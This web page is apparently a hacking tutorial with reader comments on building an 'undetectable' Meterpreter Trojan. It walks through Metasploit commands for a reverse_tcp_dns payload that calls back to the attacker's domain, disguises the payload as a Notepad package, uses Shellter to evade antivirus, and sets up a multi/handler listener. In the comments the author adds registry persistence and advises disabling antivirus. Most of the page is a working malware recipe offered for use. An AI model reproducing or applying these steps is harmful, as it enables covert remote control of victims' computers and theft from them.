How To: Create an Undetectable Trojan Using a Domain Name

Create an Undetectable Trojan Using a Domain Name

In this tutorial I am going to show you how to create an undetectable Meterpreter Trojan using a Domain name. I have taken a few guides/tutorials and built it into one. The first part is creating the DNS Payload. The second part is creating the Executable file. Part 3 is using both in Shellter to create your undetectable Trojan. Part 4 is setting up your listener using Armitage.

Things You Will Need:

  • Kali Linux
  • Windows
  • A No IP account with a domain name
  • A forwarded port on your router
  • Shellter

Part 1: Creating the DNS Payload

Using Kali:

  1. Open Metasploit on Kali by typing msfconsole in a terminal.
  2. Type use payload/windows/meterpreter/reverse_tcp_dns.
  3. Type show options. This will show you that you need to set your lhost and lport.
  4. Type set lhost (hostname you created, without http://).
  5. Type set lport (port you have forwarded on your router set for the Kali machine).
  6. Type generate -h. This will show you the options for generating the payload. You can choose different options but at least do the following.
  7. Type generate -f (file name you choose for the payload) -p windows -t raw. Ex. generate -f DNS -p windows -t raw
  8. Exit the terminal and click on Files. Your payload will be in your Home (Unless you set an option for a different location).
  9. Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).

Part 2: Creating the Executable File in Windows

  1. Choose option that applies to you. (Important as Shellter does not work with 64-bit executables).
  • 32-bit Windows - Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator)
  • 64-bit Windows - Navigate to C:\Windows\SysWOW64\iexpress.exe (Right click and select run as administrator)
  1. Choose Create new Self Extraction Directive File and click next.
  2. Click next on the Package Purpose page.
  3. Type the title of the package. (This can be anything you want) Ex: Notepad.exe
  4. No Prompt, click next.
  5. Do not display a license. Click next.
  6. Click Add and choose any file on your computer. I choose Notepad.exe in the C:\Windows\System32 folder. Click Next.
  7. Click the drop arrow and choose the file name you choose on the last screen. Click Next.
  8. Choose Hidden and then click next.
  9. No Message. Click Next
  10. Click Browse and type a name for your malware file and a destination. Check the Hide File Extracting Progress Animation from user. Click Next.
  11. Select No restart and then click next.
  12. You can then either choose to save the self extraction directive or don't save. Click Next.
  13. Click Next again on the create Package. Then click Finish.

Part 3: Using Both Created Files in Shellter to Create Your Trojan

  1. Open the folder that Shellter is in. Right click on Shellter.exe and click Run as Administrator.
  2. Type A for Auto.
  3. Type N for No.
  4. Type the location of your created EXE file from Part 2 and hit enter. Let Shellter do it's thing for 30 seconds to a minute.
  5. When asked to choose payload, type C for custom.
  6. Type the location of your created payload in Part 1 and hit enter.
  7. Type N for No reflective DLL loader.
  8. Hit enter and let Shellter finish doing it's thing If it says Injection Verified! you should have a working undetectable Trojan.
  9. Hit enter to exit Shellter.

Part 4: Set Up Your Listener

You can either use Metasploit or Armitage. I prefer Armitage so my tutorial will be for that.

  1. Go back to Kali.
  2. Open Terminal and type Msfupdate
  3. Once it's done type apt-get install armitage.
  4. Type msfdb init
  5. Open Armitage
  6. Click Connect
  7. Click Yes
  8. Once Armitage opens type: use exploit/multi/handler
  9. Type set lhost 0.0.0.0
  10. Type set lport (your port you forwarded in your router)
  11. Type set payload windows/meterpreter/reverse tcp dns
  12. Type set exitonsession false
  13. (Optional.) Type set autorunscript migrate -f
  14. (Optional.) Type set prependmigrate True
  15. Type exploit -j

(Optional steps are to migrate the process automatically so the session does not end before you can do it manually)

Now you should be able to run your undetectable Trojan and get a Meterpreter session.

DO NOT Upload your created Executable to online sites such as Virus Total.

Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:

29 Comments

Next time, could you give a little more insight as to how these things are working. This does nothing but feed the script kiddies. We need to know how these things work in order to use them properly. Doing nothing but listing steps doesn't teach anything.

-Defalt

I'm not sure I understand what you mean. Isn't it self explanatory? Could you give me an example?

People don't learn anything by reading this. All this does is give steps with no knowledge behind them.

So please give me an example of how to say it differently.

Like a screenshot of the behavior. So the person can get a end-end theme of how and what about this wonderful article

Thank you. I can understand that. I didn't really think about that. Personally I don't need pictures to learn. I look at it like a recipe. As long as the steps are there in the correct order, you can get the finished product and with repetition and research you learn.

Exactly. Think of it like a recipe. If all you know is the recipe, you'll never be able to cook anything new. But if you know about the foods in the recipe, you can cook anything.

Please work harder and give us the full insights. You gotta push your time.

Completely agree with this guy. Give us the insights. We dont want to be script kiddies!

What is the problem of this?

Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec: p, --forced-package-id, 127, --min-sdk-version, 7, --target-sdk-version, 23, --version-code, 451234, --version-name, 2.16.144, -F, /tmp/APKTOOL6959696925331005382.tmp, -0, arsc, -0, arsc, -I, /root/apktool/framework/1.apk, -S, /root/original/res, -M, /root/original/AndroidManifest.xml

at brut.androlib.Androlib.buildResourcesFull(Androlib.java:437)
at brut.androlib.Androlib.buildResources(Androlib.java:371)
at brut.androlib.Androlib.build(Androlib.java:281)
at brut.androlib.Androlib.build(Androlib.java:254)
at brut.apktool.Main.cmdBuild(Main.java:224)
at brut.apktool.Main.main(Main.java:84)

how do i generate this account with the domain?

People are always trying to be above the world, while forgetting what the world is capable off, it's always the most successful criminals who forget they aren't always exploiting sheep, there is always a shepherd in the mist of your plans

Thanks for your sharing guys...
I learn much from this post

ok i don't wana copy and paste this.. i wana do my own.. how long will it takes me to be able to do my own?. which filed should i focus on it?. does it need creativity, or its just by studying, hard work and following rules?

Mr Hacker, I wanna become a hacker. I didn't know where to start from so I started on Linux and Python and ultimately things mixed up and I didn't know which one to concentrate on. With several topics on hacking, I can't choose the way to start. It would be of great help if you could just tell me the path, where to start from and the resources (this website will be enough, I suppose) it would of great help. I didn't know how to contact you, that's why I am commenting on your latest post. Please do respond....

"Undetectable"?

I guarantee it's detectable, and registering a domain name just makes it easier to trace...

At least it's more useful than the "VBScript for DDosing Sites" :\

Its not always undetectable and not undetectable by all Antiviruses however Shellter does a great job of hidding the malicious code. And yes, a DNS hostname can make it easier for detection however my point of using the DNS is to make it still run when your IP address changes. My old connection would change my IP all the time.

TRAVELER can we talk privately?

TRAVELER can we talk privately?

i run shellter on windows 10 and it gives me that:
Enable Stealth Mode? (Y/N/H)
What is the correct option?

lol, the victim only has to restart his machine and he gets rid of the attacker... you have to put the virus in the autostart somehow so that it always starts with windows. Whats the best way to do this? I wrote a vbscript to solve it.

Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).

How is this even supposed to work, my AV does always detect my virus. This tutorial is crap! And btw windows 10 detects and deletes shelter.exe !

What exe are you using to create the Trojan? It must be one not currently detected by AV software. Like creating your own exe in my tutorial. Secondly, disable your AV or add to exclusions if it's detecting either Shellter or your created payload. (only get Shellter from http://shellterproject.com )

As for your other question, to get persistence without triggering an AV use registry persistence. When setting up your listener type

set autorunscript exploit/windows/local/registry-persistence (change the dash to an underscore) Lhost=publicIP lport=another open port.

To get the connection back re-set up your listener to the second open port instead.

EVERYTHING SOUNDING SWAHILI TO ME.I REALLY NEED SOMEONE TO HOLD MY HAND

HeFor example, is it the last DNS to do it?llo friends I din't notice

For example, is it the last DNS to do it?

Share Your Thoughts

  • Hot
  • Latest